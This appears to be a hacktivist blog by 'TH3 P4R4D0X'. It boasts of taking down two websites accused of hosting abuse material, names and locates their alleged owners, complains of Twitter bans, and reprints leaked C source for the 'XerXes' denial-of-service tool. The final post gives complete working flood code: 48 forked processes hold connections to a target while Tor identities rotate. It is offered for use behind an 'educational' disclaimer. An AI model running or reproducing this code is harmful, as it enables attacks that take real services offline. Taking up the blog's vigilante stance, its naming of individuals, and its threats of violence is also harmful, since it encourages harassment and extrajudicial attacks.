TH3 P4R4D0X

Why I attacked www.isanybodydown.com

Following on the heels of last night’s raid, it was brought to my attention tonight, by a few members of Anonymous, that isanybodydown.com has been hosting and distributing child pornography and engaging in exploitation by presenting a fake “law firm” that would “take action” to “remove” certain posts from the site, assuming the victim(s) paid a “legal fee” ranging from $200-300. Not surprisingly, the “lawyers” are the assholes who own and operate the website. At least the guys from anonib.com had enough taste to pass their site off as an “image board”. The two owners of tonight’s target not only laugh about the images being stolen, they also encourage anyone to submit dox (personally identifying information like phone number, email, address, etc) to the posts. Effectively, this website is a breeding ground for pedophiles, stalkers, rapists, etc. Needless to say, I couldn’t go to sleep without taking action. I vowed to take the site down tonight, or go down myself.

Effective as of 9am UTC - TANGO DOWN.

The server, physically located in a data center in Romania, has been pulled from the rack and is awaiting forensics imaging. Currently, the Romanian Police have been notified and will be taking custody of the image. Additionally, the domain registrar is located in France - the French Police have been notified and will be collecting information from the registrar.

The owners, Craig Brittain and Chance Trahan, are located in Colorado and Arizona, respectively. Colorado Springs Police, Colorado State Police, and Tempe, AZ PD are aware of the situation and will be acting quickly as well. Finally, the FBI has been informed and will be overseeing the investigation upon collection of all evidences.

It is my hope and prayer that the young women, who clearly suffer from quite questionable judgement, will learn a lesson and will treat their exposed bodies with more dignity and respect, as well as take greater precautions in restricting who can and cannot see personal information on Facebook, Twitter, etc.

Moral of the story: If you victimize, terrorize, exploit, or harm others, I will find you, and I will make you pay, one way or another.

Sleep well my friends.

(Source: twitter.com)

Why I attacked anonib.com

Tonight, I successfully took down anonib.com. Many folks have been wondering why. So here’s my response.

Earlier tonight, I was lounging around IRC, when I noticed a request for help in a DDoS attack against the site. Typically, I refuse to participate in “group efforts” with Anonymous, as I prefer the lone wolf approach. However, the reason for the attack quickly caught my attention. The website had been accused of hosting child pornography. Without hesitation, I began my own investigation, during a failed DDoS attack (which I was not part of, only aware of) I might add, and quickly came across a large quantity of clearly inappropriate material. It is one thing for a website, especially one claiming to be “Anonymous” to host pornography - but child pornography crosses the line every time. Websites like this give Anonymous a bad reputation, and a bad public image.

In addition, this website’s content is comprised of images that have clearly been “stolen” (there’s even a ‘stolen images’ category) or otherwise obtained without the knowledge or permission of the individual depicted. These ladies have questionable judgement in their actions, but they do not deserve to be plastered on the screens of countless pedophiles and perverts CLAIMING to be “Anonymous” members. To say the least, these pervs make me want to spew my Christmas dinner. I have no sympathies for the owner and operator of this website, regardless of the outcome of the child pornography investigation. At the very least, he should be thankful that I, myself, have not hunted him down and castrated his sorry ass.

I merely sent a few emails, and may have sent a few stool pigeons on a mission to “tip off” certain agencies and organizations. Interestingly enough, after a few emails exchanged with the hosting provider and the registrar, as well as law enforcement agencies, the domain and server have been suspended, pending review. Law enforcement is launching an investigation into this content, and the website owner has been identified and his ‘dox’ handed over accordingly.

Moral of tonight’s story? Porn is ok, if that’s your thing - but unless you’re a feline, kitty porn is outright unacceptable.

UPDATE: As the hosting provider of the website is located in the Netherlands, the Dutch Police have been notified and are now investigating the website, its content, and owner. Hope whoever submitted images to it took precautions to hide their IP address.

(Source: twitter.com)

Twitter suspends @TH3P4R4D0X yet again.

Someone @ Twitter must be uncomfortable with me around. They continuously seem to find reasons to ban me. They’re typical excuse is I “follow too many accounts” or I “mention too much.”

This comes as no surprise to me. After all, I’d be concerned with me too. Nonetheless, Twitter seems to think they can keep me at bay. Therefore, I will always keep my official handles listed on my blog here. If they finally ban me, I will only return with a new handle.

You cannot silence me. I am TH3 P4R4D0X. I am the devil’s favorite demon. ;-)

“XerXes” source code leaked?

This C source code was originally leaked to Pastebin.com by a guest claiming to be a member of LulzSec. I have redacted the original comments by the submitter, as they are irrelevant to the code. However, the individual claims this code to be the foundation of the XerXes tool used by th3j35t3r, albeit without the modifications @th3j35t3r claims to have made.

Regardless of the true origin of the code and whether or not it exists anywhere inside th3j35t3r’s toolkit, analysis concludes that it obviously performs a DoS attack, returns information on the ongoing attack, and possesses the capability to route itself through ToR and to fire it’s attack from random IP addresses within the ToR network. These techniques are all utilized by XerXes, so this may or may not be “legit,” Nonetheless, we will never know as th3j35t3r maintains his hellbent attitude of “secrecy.”

I am sharing it for 2 purposes.

1. To empower individuals to stress and harden their own servers to this attack.
2. Educate individuals on how such a tool works

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>


int make_socket(char *host, char *port) {
	struct addrinfo hints, *servinfo, *p;
	int sock, r;
//	fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
		fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
		exit(0);
	}
	for(p = servinfo; p != NULL; p = p->ai_next) {
		if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
			continue;
		}
		if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
			close(sock);
			continue;
		}
		break;
	}
	if(p == NULL) {
		if(servinfo)
			freeaddrinfo(servinfo);
		fprintf(stderr, "No connection could be made\n");
		exit(0);
	}
	if(servinfo)
		freeaddrinfo(servinfo);
	fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
	return sock;
}

void broke(int s) {
	// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
	int sockets[CONNECTIONS];
	int x, g=1, r;
	for(x=0; x!= CONNECTIONS; x++)
		sockets[x]=0;
	signal(SIGPIPE, &broke);
	while(1) {
		for(x=0; x != CONNECTIONS; x++) {
			if(sockets[x] == 0)
				sockets[x] = make_socket(host, port);
			r=write(sockets[x], "\0", 1);
			if(r == -1) {
				close(sockets[x]);
				sockets[x] = make_socket(host, port);
			} else
//				fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
			fprintf(stderr, "[%i: Voly Sent]\n", id);
		}
		fprintf(stderr, "[%i: Voly Sent]\n", id);
		usleep(300000);
	}
}

void cycle_identity() {
	int r;
	int socket = make_socket("localhost", "9050");
	write(socket, "AUTHENTICATE \"\"\n", 16);
	while(1) {
		r=write(socket, "signal NEWNYM\n\x00", 16);
		fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
		usleep(300000);
	}
}

int main(int argc, char **argv) {
	int x;
	if(argc !=3)
		cycle_identity();
	for(x=0; x != THREADS; x++) {
		if(fork())
			attack(argv[1], argv[2], x);
		usleep(200000);
	}
	getc(stdin);
	return 0;
}

Disclaimer: For educational use only.

(Source: pastebin.com)